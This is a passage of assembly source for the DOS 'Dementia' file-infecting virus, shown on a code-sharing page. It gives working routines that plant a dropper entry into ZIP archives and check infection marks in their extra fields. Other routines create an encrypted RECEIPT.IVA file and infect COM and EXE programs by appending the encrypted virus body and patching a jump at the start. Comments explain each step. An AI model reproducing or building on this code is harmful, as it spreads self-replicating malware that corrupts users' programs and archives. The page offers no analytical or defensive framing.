📄 dementia.asm
字号:
mov ds:[14h],ax ; Store low-order word of compress...
mov ds:[18h],ax ; Store low-order word of uncompre...
mov ax,[bp-1ah] ; AX = high-order word of filesize
mov ds:[16h],ax ; Store high-order word of compres...
mov ds:[1ah],ax ; Store high-order word of compres...
mov ax,0ch ; AX = filename length (12 bytes)
mov ds:[1ch],ax ; Store filename length (12 bytes)
xor ax,ax ; AX = extra field length, file co...
mov ds:[1eh],ax ; Store extra field length (0 bytes)
mov ds:[20h],ax ; Store file comment length (0 bytes)
mov ds:[22h],ax ; Store disk number start (0 bytes)
mov ds:[24h],ax ; Store internal file attributes
mov ds:[26h],ax ; Store low-order word of external...
mov ds:[28h],ax ; Store high-order word of externa...
mov ax,[bp-18h] ; AX = low-order word of offset of...
mov ds:[2ah],ax ; Store low-order word of relative...
mov ax,[bp-16h] ; AX = high-order word of offset o...
mov ds:[2ch],ax ; Store high-order word of relativ...
mov bx,[bp-08h] ; BX = file handle of ZIP file
mov cx,2eh ; Write forty-six bytes
call write_file
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
lea dx,filename ; DX = offset of filename
nop
mov cx,0ch ; Write twelve bytes
nop
call write_file_
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
mov ax,'KP' ; AX = low-order word of end of ce...
mov ds:[00h],ax ; Store low-order word of end of c...
mov ax,605h ; AX = high-order word of end of c...
mov ds:[02h],ax ; Store high-order word of end of ...
mov bx,[bp-0ah] ; BX = file handle of !#TEMP#!
mov cx,12h ; Read eightteen bytes
mov dx,04h ; DX = offset of end of central di...
call read_file_
mov cx,ds:[14h] ; CX = zipfile comment length
push cx ; Save CX at stack
mov dx,16h ; DX = offset of zipfile comment
call read_file_
mov ax,ds:[08h] ; AX = total number of entries in ...
inc ax ; Increase total number of entries...
mov ds:[08h],ax ; Store total number of entries in...
mov ax,ds:[0ah] ; AX = total number of entries in ...
inc ax ; Increase total number of entries...
mov ds:[0ah],ax ; Store total number of entries in...
mov ax,ds:[0ch] ; AX = low-order word of size of t...
mov dx,ds:[0eh] ; DX = high-order word of size of ...
add ax,3ah ; Add size of central directory fi...
nop
adc dx,00h ; Convert to 32-bit
mov ds:[0ch],ax ; Store low-order word of size of ...
mov ds:[0eh],dx ; Store high-order word of size of...
mov ax,ds:[10h] ; AX = low-order word of offset of...
mov dx,ds:[12h] ; DX = high-order word of offset o...
add ax,2ah ; Add size of local file header to...
nop
adc dx,00h ; Convert to 32-bit
mov bx,[bp-1ah] ; BX = high-order word of filesize
add dx,bx ; Add high-order word of filesize ...
mov bx,[bp-1ch] ; BX = low-order word of filesize
add ax,bx ; Add low-order word of filesize t...
adc dx,00h ; Convert to 32-bit
mov ds:[10h],ax ; Store low-order word of offset o...
mov ds:[12h],dx ; Store high-order word of offset ...
mov bx,[bp-08h] ; BX = file handle of ZIP file
pop cx ; Load CX from stack
add cx,16h ; Add size of end of central direc...
call write_file
mov bx,[bp-14h] ; BX = file handle of CALLFAST.COM
call close_file
lea dx,filename ; DX = offset of filename
nop
call delete_file
jmp call_mark_
test_receipt:
mov ax,[bp-12h] ; AX = found RECEIPT.IVA
or ax,ax ; Didn't found RECEIPT.IVA
jz exam_extra ; Zero? Jump to exam_extra
jmp call_mark_
exam_extra:
mov bx,[bp-08h] ; BX = file handle of ZIP file
mov cx,[bp-22h] ; CX = high-order word of extra field
mov dx,[bp-24h] ; DX = low-order word of extra field
call set_pos_sof_
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
mov es,ax ; ES = segment of data buffer
mov cx,400h ; Read one thousand and twenty-fou...
call read_file
cld ; Clear direction flag
xor si,si ; Zero SI
xor di,di ; Zero DI
lodsw ; AX = word of extra field
cmp ax,1492h ; Found infection mark?
je comp_extra ; Equal? Jump to comp_extra
jmp call_mark_
comp_extra:
lodsw ; AX = word of extra field
cmp ax,1776h ; Found infection mark?
je load_extra ; Equal? Jump to load_extra
jmp call_mark_
load_extra:
lodsw ; AX = 16-bit decryption key
mov dx,ax ; DX = " " "
lodsb ; AL = number of file specifications
xor cx,cx ; Zero CX
mov cl,al ; CL = number of filespecification
push ax ; Save AX at stack
decrypt_next:
push cx ; Save CX at stack
mov cx,07h ; Decryption fourteen bytes
decrypt_spec:
lodsw ; AX = word of encrypted file spec...
xor ax,dx ; Decrypt word of file specification
stosw ; Store word of file specification
loop decrypt_spec
pop cx ; Load CX from stack
loop decrypt_next
mov ax,ds ; AX = segment of data buffer
add ax,40h ; AX = segment of pathname
mov es,ax ; ES = " " "
push ds ; Save DS at stack
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
mov ah,47h ; Get current directory
xor dl,dl ; Default drive
xor si,si ; Zero SI
int 21h
pop ds ; Load DS from stack
mov ax,es ; AX = segment of pathname
add ax,04h ; AX = segment of end of pathname
mov es,ax ; ES = " " " " "
xor di,di ; Zero DI
mov al,'\' ; AL = backslash
stosb ; Store backslash
xor al,al ; AL = zero
stosb ; Store zero
push es ; Save ES at stack
mov ah,2fh ; Get disk transfer area address
int 21h
mov [bp-26h],es ; Store segment of disk transfer a...
mov [bp-28h],bx ; Store offset of disk transfer ar...
pop es ; Load ES from stack
push ds ; Save DS at stack
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+48h
mov ds,ax ; DS = segment of disk transfer area
xor dx,dx ; Zero DX
mov ah,1ah ; Set disk transfer area address
int 21h
lea dx,receipt_iva ; DX = offset of receipt_iva
nop
call create_file
mov bx,ax ; BX = file handle of RECEIPT.IVA
mov [bp-14h],ax ; Store file handle of RECEIPT.IVA
pop ds ; Load DS from stack
pop ax ; Load AX from stack
mov dx,01h ; Don't store backslash
call create_recei
mov bx,[bp-14h] ; BX = file handle of RECEIPT.IVA
call set_pos_sof
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+48h
mov ds,ax ; DS = segment of disk transfer area
mov es,ax ; ES = " " " " "
encrypt_rece:
mov cx,400h ; Read one thousand and twenty-fou...
call read_file
cmp ax,00h ; Read all of the file?
je set_dta_addr ; Equal? Jump to set_dta_addr
push ax ; Save AX at stack
xor dx,dx ; Zero DX
sub dx,ax ; DX = -number of bytes actually read
mov cx,-01h
call set_pos_cfp
pop ax ; Load AX from stack
push ax ; Save AX at stack
mov cx,ax ; CX = number of bytes actually read
xor si,si ; Zero SI
xor di,di ; Zero DI
encrypt_ipt_:
lodsb ; AL = byte of RECEIPT.IVA
xor al,0ffh ; Encrypt byte of RECEIPT.IVA
stosb ; Store encrypted byte of RECEIPT.IVA
loop encrypt_ipt_
pop ax ; Load AX from stack
mov cx,ax ; CX = number of bytes actually read
call write_file
jmp encrypt_rece
set_dta_addr:
call close_file
mov ds,[bp-26h] ; DS = segment of disk transfer area
mov dx,[bp-28h] ; DX = offset of disk transfer area
mov ah,1ah ; Set disk transfer area address
int 21h
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+40h
mov ds,ax ; DS = segment of data buffer
xor dx,dx ; Zero DX
mov ah,3bh ; Set current directory
int 21h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
lea si,receipt_iva ; SI = offset of receipt_iva
nop
lea di,filename ; DI = offset of filename
nop
mov cx,0dh ; Move thirteen bytes
rep movsb ; Move RECEIPT.IVA to filename
jmp open_filenam
call_mark_:
mov bx,[bp-08h] ; BX = file handle of ZIP file
call infect_mark
mov bx,[bp-08h] ; BX = file handle of ZIP file
call close_file
mov bx,[bp-0ah] ; BX = file handle of !#TEMP#!
call close_file
lea dx,temp_file ; DX = offset of temp_file
nop
call delete_file
inf_zip_exit:
call int24_load
pop es ds di si dx cx bx ax
mov sp,bp ; SP = stack pointer
pop bp ; Load BP from stack
ret ; Return!
endp
infect_com proc near ; Infect COM file
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,04h ; Correct stack pointer
mov ah,00h ; COM executable
nop
nop
mov cs:[com_or_exe],ah ; Store COM executable
mov ax,ds:[00h] ; AX = word of original code of CO...
mov word ptr cs:[origin_code],ax
mov al,ds:[02h] ; AL = byte of original code of CO...
mov cs:[origin_code+02h],al
call encrypt_copy
call set_pos_eof
mov [bp-04h],ax ; Store low-order word of filesize
mov [bp-02h],dx ; Store high-order word of filesize
push ax ; Save AX at stack
mov ax,cs:[tst_filesize]
cmp ax,01h ; Don't test filesize?
pop ax ; Load AX from stack
je calc_buf_seg ; Equal? Jump to calc_buf_seg
cmp dx,00h ; Filesize too large?
jne inf_com_exit ; Not equal? Jump to inf_com_exit
cmp ax,1000h ; Filesize too small?
jb inf_com_exit ; Below? Jump to inf_com_exit
calc_buf_seg:
add ax,(code_end-code_begin)
jb inf_com_exit ; Filesize too large? Jump to inf_...
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
mov cx,10h ; CX = number of bytes to add to f...
mov ax,[bp-04h] ; AX = filesize
and ax,0000000000001111b
sub cx,ax ; CX = number of bytes to add to f...
mov ax,[bp-04h] ; AX = filesize
add ax,cx ; AX = offset of virus within file
mov [bp-04h],ax ; Store offset of virus within file
call write_file_
mov cx,(code_end-code_begin)
call write_file
mov al,0e9h ; JMP imm16 (opcode 0e9h)
mov ds:[00h],al ; Store JMP imm16
mov ax,[bp-04h] ; AX = filesize
sub ax,03h ; Subtract size of opcode JMP imm16
mov ds:[01h],ax ; Store 16-bit immediate
call set_pos_sof
mov cx,03h ; Write three bytes
call write_file
inf_com_exit:
mov sp,bp ; SP = stack pointer
pop bp ; Load BP from stack
ret ; Return!
endp
infect_exe proc near ; Infect EXE file
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,04h ; Correct stack pointer
mov ah,01h ; EXE executable
nop
nop
mov cs:[com_or_exe],ah ; Store EXE executable
call set_pos_eof
mov [bp-04h],ax ; Store low-order word of filesize
mov [bp-02h],dx ; Store high-order word of filesize
and ax,0000000000001111b
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -